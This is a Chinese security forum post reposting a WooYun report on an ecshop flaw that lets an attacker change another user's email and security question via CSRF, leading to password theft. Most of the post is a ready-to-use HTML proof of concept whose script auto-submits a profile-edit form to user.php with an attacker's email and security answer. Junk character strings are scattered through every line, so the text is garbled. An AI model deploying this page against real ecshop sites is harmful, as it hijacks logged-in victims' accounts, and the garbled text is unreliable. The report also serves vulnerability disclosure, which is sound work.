找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2103|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:6 O& G! t3 W1 V7 g6 a( s4 N+ W
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现4 S% k) w+ ~9 g/ t0 D9 q
& I' U* ~/ w5 Y4 o
Demo For:http://www.wooyun.org/bug.php?action=view&id=395! u2 `9 U3 l' v9 o  ]0 ?/ ^1 R7 _

& \6 z8 j0 o8 e6 L详细说明:
0 G1 ~* W1 L: c2 H( u利用csrf和xss可以突破官方所说的“障碍”
9 t) q5 V9 O$ U7 X, P; I$ gxss版本已经有人说明
3 `% @& o' R* G# |/ m/ Q这里给出csrf版本9 Q: D: Y4 A5 Z9 O3 g5 X2 u
  E3 t$ I0 I, g% s# ]- H
漏洞证明:9 B2 i- V7 a: D* @" `
<html>
" G' K6 [  B8 Z( O# r<body>
' H8 U7 I. _& v6 d5 }  _. I/ v<form action="http://www.wooyun.org/ecshop/user.php" method="POST">8 h7 E  E" y! F7 g) x* T
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">; l* ?, N" l( |4 D  y
<INPUT TYPE="text" NAME="act" value="act_edit_profile">. b2 r6 L1 U0 w
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
2 x. k6 y: e4 d; b2 E: z- P<INPUT TYPE="text" NAME="passwd_answer" value="exploit">/ d5 E6 |* G: {8 D; h
</body>2 u5 d* [- k. `4 g, y
<script>. n/ ]  c! W/ V3 `8 C# X
document.forms[0].submit();# `3 M5 l9 M0 ]- _( ~/ h% z
</script>
/ H* ]9 F0 e# P0 N# h8 U4 |% {2 l; i</html>& Q2 n, b! X$ @. R$ a/ x
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失  J7 [: B' S( m3 t
5 \4 p8 Y) m3 c: A" d& i2 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表